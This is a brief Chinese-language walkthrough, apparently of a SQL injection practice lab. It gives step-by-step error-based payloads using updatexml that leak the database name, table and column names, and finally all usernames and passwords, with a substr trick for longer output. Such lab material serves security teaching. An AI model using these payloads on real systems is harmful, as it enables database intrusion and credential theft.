0、初始页面
1、确定闭合字符
2、确定列数
3、确定回显位置
无回显,但是有报错
a" union select 1,2 #
4、爆库名
a" and updatexml(1,concat(0x7e,database(),0x7e),1) #
5、爆表名
a" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) #
6、爆列名
a" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name = 'users' and table_schema='security'),0x7e),1) #
7、查询最终结果
a" and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1) #
会用substr可32位字符查看
a" and updatexml(1,concat(0x7e,(substr((select group_concat(username,0x3a,password) from users),1,32)),0x7e),1) #